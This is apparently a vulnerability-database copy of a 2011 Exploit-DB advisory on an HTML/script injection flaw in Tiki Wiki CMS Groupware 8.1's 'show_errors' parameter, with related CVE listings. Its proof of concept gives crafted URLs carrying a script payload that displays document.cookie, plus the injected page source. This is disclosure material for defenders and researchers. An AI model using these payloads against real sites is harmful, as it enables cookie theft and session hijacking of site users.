Lucene search
+L

Tiki Wiki CMS Groupware 8.1 - 'show_errors' HTML Injection

🗓️ 20 Dec 2011 00:00:00Reported by Stefan SchurtzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Tiki Wiki CMS Groupware 8.1 HTML Injection vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2011-4551
20 Dec 201100:00
circl
cve
CVE
CVE-2011-4551
1 Oct 201200:00
cve
cvelist
Cvelist
CVE-2011-4551
1 Oct 201200:00
cvelist
euvd
EUVD
EUVD-2011-4477
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-4551
1 Oct 201200:55
nvd
openvas
OpenVAS
Tiki Wiki CMS Groupware 'show_errors' Parameter Stored XSS Vulnerability
21 Dec 201100:00
openvas
packetstorm
Packet Storm
Tiki Wiki CMS Groupware 8.1 / 6.4 LTS Cross Site Scripting
20 Dec 201100:00
packetstorm
prion
Prion
Cross site scripting
1 Oct 201200:55
prion
redhatcve
RedhatCVE
CVE-2011-4551
22 May 202504:22
redhatcve
securityvulns
securityvulns
Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
26 Dec 201100:00
securityvulns
Rows per page
source: https://www.securityfocus.com/bid/51128/info

Tiki Wiki CMS Groupware is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Tested with Firefox 7.01

Visit this URL

http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site

But when you visit one of this pages, the XSS will be executed

http://www.example.com/tiki-8.1/tiki-login.php
http://www.example.com/tiki-8.1/tiki-remind_password.php

// browser source code

show_errors: &#039;y&#039;,
		xss: &#039;</style></script><script>alert(document.cookie)</script>&#039;
};

Another example:

http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://www.example.com/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>

All of them will be executed!

// browser source code

show_errors: &#039;y&#039;,
	xss1: &#039;</style></script><script>alert(document.cookie)</script>&#039;,
	xss2: &#039;</style></script><script>alert(document.cookie)</script>&#039;,
	xss3: &#039;</style></script><script>alert(document.cookie)</script>&#039;
};

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation